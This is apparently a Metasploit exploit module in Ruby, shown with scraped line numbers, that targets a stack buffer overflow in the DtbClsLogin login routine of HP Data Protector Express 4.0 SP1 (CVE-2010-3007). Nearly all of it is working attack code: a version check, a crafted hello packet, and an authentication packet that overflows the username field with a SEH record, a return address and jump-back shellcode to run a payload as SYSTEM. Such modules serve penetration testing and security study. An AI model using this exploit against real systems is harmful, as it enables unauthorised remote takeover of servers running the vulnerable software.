CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = NormalRanking
8

9
  include Msf::Exploit::Remote::Tcp
10
  include Msf::Exploit::Remote::Seh
11

12
  def initialize(info = {})
13
    super(update_info(info,
14
      'Name'           => 'HP Data Protector DtbClsLogin Buffer Overflow',
15
      'Description'    => %q{
16
          This module exploits a stack buffer overflow in HP Data Protector 4.0 SP1. The
17
        overflow occurs during the login process, in the DtbClsLogin function provided by
18
        the dpwindtb.dll component, where the Utf8Cpy (strcpy like function) is used in an
19
        insecure way with the username. A successful exploitation will lead to code execution
20
        with the privileges of the "dpwinsdr.exe" (HP Data Protector Express Domain Server
21
        Service) process, which runs as SYSTEM by default.
22
      },
23
      'Author'         =>
24
        [
25
          'AbdulAziz Hariri', # Vulnerability discovery
26
          'juan vazquez' # Metasploit module
27
        ],
28
      'References'     =>
29
        [
30
          [ 'CVE', '2010-3007' ],
31
          [ 'OSVDB', '67973' ],
32
          [ 'BID', '43105' ],
33
          [ 'ZDI', '10-174' ],
34
          [ 'URL', 'http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02498535' ]
35
        ],
36
      'Payload'        =>
37
        {
38
          'Space' => 712,
39
          'BadChars' => "\x00",
40
          'DisableNops' => true
41
        },
42
      'Platform'       => 'win',
43
      'Targets'        =>
44
        [
45
          ['HP Data Protector Express 4.0 SP1 (build 43064) / Windows XP SP3',
46
            {
47
              'Ret' => 0x66dd3e49, # ppr from ifsutil.dll (stable over windows updates on June 26, 2012)
48
              'Offset' => 712
49
            }
50
          ]
51
        ],
52
      'DefaultTarget' => 0,
53
      'Privileged'     => true,
54
      'DisclosureDate' => '2010-09-09'
55
      ))
56
    register_options(
57
      [
58
        Opt::RPORT(3817),
59
      ])
60
  end
61

62
  def check
63
    connect
64

65
    machine_name = rand_text_alpha(15)
66

67
    print_status("#{sock.peerinfo} - Sending Hello Request")
68
    hello =  "\x54\x84\x00\x00\x00\x00\x00\x00" << "\x00\x01\x00\x00\x92\x00\x00\x00"
69
    hello << "\x3a\x53\xa5\x71\x02\x40\x80\x00" << "\x89\xff\xb5\x00\x9b\xe8\x9a\x00"
70
    hello << "\x01\x00\x00\x00\xc0\xa8\x01\x86" << "\x00\x00\x00\x00\x00\x00\x00\x00"
71
    hello << "\x00\x00\x00\x00\x00\x00\x00\x00" << "\x00\x00\x00\x00\x00\x00\x00\x00"
72
    hello << "\x00\x00\x00\x00\x01\x00\x00\x00" << "\x00\x00\x00\x00\x00\x00\x00\x00"
73
    hello << "\x00\x00\x00\x00"
74
    hello << machine_name << "\x00"
75
    hello << "\x5b\x2e\xad\x71\xb0\x02\x00\x00" << "\xff\xff\x00\x00\x06\x10\x00\x44"
76
    hello << "\x74\x62\x3a\x20\x43\x6f\x6e\x74" << "\x65\x78\x74\x00\xe8\xc1\x08\x10"
77
    hello << "\xb0\x02\x00\x00\xff\xff\x00\x00" << "\x06\x10\x00\x00\x7c\xfa"
78

79
    sock.put(hello)
80
    hello_response = sock.get_once(-1, 10)
81
    disconnect
82

83
    if hello_response and hello_response =~ /Dtb: Context/
84
      return Exploit::CheckCode::Detected
85
    end
86

87
    return Exploit::CheckCode::Safe
88

89
  end
90

91
  def exploit
92

93
    connect
94

95
    machine_name = rand_text_alpha(15)
96

97
    print_status("#{sock.peerinfo} - Sending Hello Request")
98
    hello =  "\x54\x84\x00\x00\x00\x00\x00\x00" << "\x00\x01\x00\x00\x92\x00\x00\x00"
99
    hello << "\x3a\x53\xa5\x71\x02\x40\x80\x00" << "\x89\xff\xb5\x00\x9b\xe8\x9a\x00"
100
    hello << "\x01\x00\x00\x00\xc0\xa8\x01\x86" << "\x00\x00\x00\x00\x00\x00\x00\x00"
101
    hello << "\x00\x00\x00\x00\x00\x00\x00\x00" << "\x00\x00\x00\x00\x00\x00\x00\x00"
102
    hello << "\x00\x00\x00\x00\x01\x00\x00\x00" << "\x00\x00\x00\x00\x00\x00\x00\x00"
103
    hello << "\x00\x00\x00\x00"
104
    hello << machine_name << "\x00"
105
    hello << "\x5b\x2e\xad\x71\xb0\x02\x00\x00" << "\xff\xff\x00\x00\x06\x10\x00\x44"
106
    hello << "\x74\x62\x3a\x20\x43\x6f\x6e\x74" << "\x65\x78\x74\x00\xe8\xc1\x08\x10"
107
    hello << "\xb0\x02\x00\x00\xff\xff\x00\x00" << "\x06\x10\x00\x00\x7c\xfa"
108

109
    sock.put(hello)
110
    hello_response = sock.get_once(-1, 10)
111

112
    if not hello_response or hello_response.empty?
113
      print_error("#{sock.peerinfo} - The Hello Request hasn't received a response")
114
      return
115
    end
116

117
    bof = payload.encoded
118
    bof << rand_text(target['Offset']-bof.length)
119
    bof << generate_seh_record(target.ret)
120
    bof << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-#{target['Offset']+8}").encode_string
121
    # The line below is used to trigger exception, don't go confused because of the big space,
122
    # there are only some available bytes until the end of the stack, it allows to assure exception
123
    # when there are mappings for dynamic memory after the stack, so to assure reliability it's better
124
    # to jump back.
125
    bof << rand_text(100000)
126

127
    header =  [0x8451].pack("V") # packet id
128
    header << [0x32020202].pack("V") # svc id
129
    header << [0x00000018].pack("V") # cmd id
130
    header << [0].pack("V") # pkt length, calculated after pkt has been built
131
    header << "\x00\x00\x00\x00" # ?Unknown?
132

133
    pkt_auth = header
134
    pkt_auth << bof # username
135

136
    pkt_auth[12, 4] = [pkt_auth.length].pack("V")
137

138
    print_status("#{sock.peerinfo} - Sending Authentication Request")
139

140
    sock.put(pkt_auth)
141
    disconnect
142
  end
143
end
144

145